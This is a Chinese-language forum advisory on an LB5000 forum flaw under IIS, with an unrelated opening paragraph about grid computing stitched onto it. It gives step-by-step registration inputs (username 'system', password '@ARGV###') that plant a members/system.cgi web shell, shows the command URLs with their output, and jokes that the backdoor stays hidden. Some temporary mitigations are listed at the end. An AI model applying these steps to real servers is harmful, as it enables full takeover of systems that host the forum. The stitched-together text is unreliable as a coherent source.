网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。
LB5000论坛系统漏洞导制服务器被黑客全部控制受影响的系统:
安装过LB5000论坛的服务器
综述:
=====
我在看了关于以下的原始资料后,我深入了研究,我们可以把把http://www.notfound.org/lb5000/cgi-bin/members/system.cgi?dir中的system.cgi做为一个cmd.exe来看(功能相似)..好了.请大家先看一下原始资料。
----------------------原始资料------------------------------
LB5000论坛漏洞
by analysist
LB5K可以算是国内最流行的论坛程序了,我以前只发现过一个提升权限的漏洞,比较高的版本基本没有什么安全问题,但是由于前些日子发现了Perl CGI在IIS下的若干问题,也想到了一些事情,今天花了点时间重新看了一下LB5K,结果发现我们完全可以利用这两个漏洞搞一个Perl CGI后门。
测试环境:
平台:Win32
服务器:IIS
支持Perl方式:CGILB5K版本:LB5000II v0830
操作步骤:
1.用户注册页面(http://www.notfound.org/lb5000/cgi-bin/register.cgi),输
入下面信息后提交:
用户名:system
密码:@ARGV###(需要输入两次)
邮件地址:thiz@thiz.org
2.后门搞定,我们测试一下:
http://ip//cgi-bin/members/system.cgi?cd
CGI ErrorThe specified CGI application misbehaved by not returning a
complete set of HTTP headers. The headers it did return are:
C:\Inetpub\cgi-bin\members
http://ip/cgi-bin/members/system.cgi?dir
CGI ErrorThe specified CGI application misbehaved by not returning a
complete set of HTTP headers. The headers it did return are:
C:\Inetpub\cgi-bin\members 的目录
2001-10-1811:23 <DIR>.
2001-10-1811:23 <DIR>..
2001-10-1811:24162 system.cgi
1 个文件162 字节
2 个目录1?615?261?696 可用字节
是不是很酷?这个后门一般是不会有人发现的啦,当然我们假设管理员不看日志!:P
临时解决方法:
1.限制“/cgi-bin/members”只能本地访问,并去掉该目录执行权限
2.将“/cgi-bin/members”改名或移到Web目录外
3.不要使用CGI方式支持Perl,可以暂时改为ISAPI方式
4.过滤特殊的用户名,如“system”,“require”,“rename”等
5.限制密码只能为数字和字母组合
PS:BBS3K以及其它所有类似CGI程序都存在此安全问题,只是攻击方法略有不同。
漏洞分析:
==========
cgi-bin\members目录里中的system.cgi是在论坛注册成功system用户后出现的一个CGI文件,后门文件为system.cgi.但打开system.cgi 来看.并没有什么后门程序..
-------------system.cgi源程序为--------------
system@ARGV###Memberme0
关键词:LB5000论坛系统漏洞导制服务器被黑客全部控制